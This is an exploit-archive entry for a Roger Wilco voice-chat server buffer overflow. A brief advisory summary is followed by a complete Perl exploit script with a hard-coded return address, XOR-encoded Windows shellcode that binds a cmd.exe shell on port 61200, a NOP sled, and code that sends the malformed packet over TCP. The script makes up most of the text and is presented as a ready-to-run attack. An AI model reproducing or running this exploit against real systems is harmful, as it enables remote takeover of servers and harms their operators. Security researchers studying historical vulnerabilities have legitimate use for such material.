source: https://www.securityfocus.com/bid/8566/info A vulnerability has been reported for various Roger Wilco server releases. The problem occurs server-side, and can be triggered when processing malformed client packets. Specifically, when connecting to a server the Roger Wilco client transmits a packet containing the size of data to be copied into an internal buffer. As a result, a malicious user could modify the size to result in excessive data being copied into a previously allocated buffer. This could ultimately allow for sensitive server memory to be corrupted, potentially resulting in the execution of arbitrary code. #!/usr/bin/perl # # RogerWilco v1.4.1.6 remote buffer overflow exploit # ...just for fun # # Binds cmd.exe shell on port 61200. # Retaddr 0x0122fa44 will works only if roger.exe has md5 # checksum 89f2d9cda1abc1f55cd06181fbdd6e43 (v.1.4.1.6). # And there is no metter what win32 operation system installed # (winnxp/2k/nt/me/9x/03). # Btw, RogerWilco is a kewl Internet Voice chat for gamers (hm). # Vendor: rogerwilco.gamespy.com. # Bug founded by Auriemma Luigi (hey dude in da third time ;]) # Advisory: security.nnov.ru/search/document.asp?docid=5074 # # Greets to all ppl from #m00sec #nerf and #priv8security (EFnet) # # d4rkgr3y [d4rk@securitylab.ru] // m00 [www.m00.ru] # use IO::Socket; $host = "127.0.0.1"; $port = "3782"; $retaddr = "\x44\xfa\x22\x01"; $shellcode = "\x33\xff". #xor edi,edi "\x33\xf6". #xor esi,esi "\x33\xdb". #xor ebx,ebx "\xB8\x01\xF0\x22\x01". #mov eax,122F020 #"\xcc". #int3 "\x83\xC0\x15\x33\xC9\x66\xB9\xD1\x01\x80\x30\x96\x40\xE2\xFA". #decryptor #winxp/2k xored portbind shellcode "\x15\x7A\xA2\x1D\x62\x7E\xD1\x97\x96\x96\x1F\x90\x69\xA0\xFE\x18\xD8\x98\x7A\x7E\xF7". "\x97\x96\x96\x1F\xD0\x9E\x69\xA0\xFE\x3B\x4F\x93\x58\x7E\xC4\x97\x96\x96\x1F\xD0". "\x9A\xFE\xFA\xFA\x96\x96\xFE\xA5\xA4\xB8\xF2\xFE\xE1\xE5\xA4\xC9\xC2\x69\xC0\x9E". "\x1F\xD0\x92\x69\xA0\xFE\xE4\x68\x25\x80\x7E\xBB\x97\x96\x96\x1F\xD0\x86\x69\xA0". "\xFE\xE8\x4E\x74\xE5\x7E\x88\x97\x96\x96\x1F\xD0\x82\x69\xE0\x92\xFE\x5D\x7B\x6A". "\xAD\x7E\x98\x97\x96\x96\x1F\xD0\x8E\x69\xE0\x92\xFE\x4F\x9F\x63\x3B\x7E\x68\x96". "\x96\x96\x1F\xD0\x8A\x69\xE0\x92\xFE\x32\x8C\xE6\x51\x7E\x78\x96\x96\x96\x1F\xD0". "\xB6\x69\xE0\x92\xFE\x32\x3B\xB8\x7F\x7E\x48\x96\x96\x96\x1F\xD0\xB2\x69\xE0\x92". "\xFE\x73\xDF\x10\xDF\x7E\x58\x96\x96\x96\x1F\xD0\xBE\x69\xE0\x92\xFE\x71\xEF\x50". "\xEF\x7E\x28\x96\x96\x96\x1F\xD0\xBA\xA5\x69\x17\x7A\x06\x97\x96\x96\xC2\xFE\x97". "\x97\x96\x96\x69\xC0\x8E\xC6\xC6\xC6\xC6\xD6\xC6\xD6\xC6\x69\xC0\x8A\x1D\x4E\xC1". "\xC1\xFE\x94\x96\x79\x86\x1D\x5A\xFC\x80\xC7\xC5\x69\xC0\xB6\xC1\xC5\x69\xC0\xB2". "\xC1\xC7\xC5\x69\xC0\xBE\x1D\x46\xFE\xF3\xEE\xF3\x96\xFE\xF5\xFB\xF2\xB8\x1F\xF0". "\xA6\x15\x7A\xC2\x1B\xAA\xB2\xA5\x56\xA5\x5F\x15\x57\x83\x3D\x74\x6B\x50\xD2\xB2". "\x86\xD2\x68\xD2\xB2\xAB\x1F\xC2\xB2\xDE\x1F\xC2\xB2\xDA\x1F\xC2\xB2\xC6\x1B\xD2". "\xB2\x86\xC2\xC6\xC7\xC7\xC7\xFC\x97\xC7\xC7\x69\xE0\xA6\xC7\x69\xC0\x86\x1D\x5A". "\xFC\x69\x69\xA7\x69\xC0\x9A\x1D\x5E\xC1\x69\xC0\xBA\x69\xC0\x82\xC3\xC0\xF2\x37". "\xA6\x96\x96\x96\x13\x56\xEE\x9A\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\x7D\x9F". "\x1D\xD6\xA2\x1D\x3E\x2E\x96\x96\x96\x1D\x53\xC8\xCB\x54\x92\x96\xC5\xC3\xC0\xC1". "\x1D\xFA\xB2\x8E\x1D\xD3\xAA\x1D\xC2\x93\xEE\x95\x43\x1D\xDC\x8E\x1D\xCC\xB6\x95". "\x4B\x75\xA4\xDF\x1D\xA2\x1D\x95\x63\xA5\x69\x6A\xA5\x56\x3A\xAC\x52\xE2\x91\x57". "\x59\x9B\x95\x6E\x7D\x64\xAD\xEA\xB2\x82\xE3\x77\x1D\xCC\xB2\x95\x4B\xF0\x1D\x9A". "\xDD\x1D\xCC\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x7D\x94\xA5\x56\x1D\x43\xC9\xC8\xCB". "\xCD\x54\x92\x96"; for($i=0;$i<1263-200-490;$i++) { $execode .= "\x90"; } $execode .= "$shellcode"; for($i=0;$i<200;$i++) { $execode .= "\x90"; } print "\n\rRogerWilco v1.4.1.6 remote buffer overflow exploit\n\n=> Connecting to $host:$port.. "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die " damn\n"; print "ok\n=> Sending exploit buffer... "; $buf = "\x0F\x00\x05\x08\x6A\xD6\x4C\x03". "\x96\xED\x3B\xE7\x88\xE2\xA9\x74". "channel". "\x00". "$execode". "$retaddr". "\x0F\x10\x00\x04". "d4rk". "\x0F\x11\x00\x04\x00\x00\x00\x02". "\x0F\x12\x00\x04\x00\x00\x00\x00"; print $socket "$buf"; print "ok\n=> Exiting... \n\n"; sleep(2); close($socket);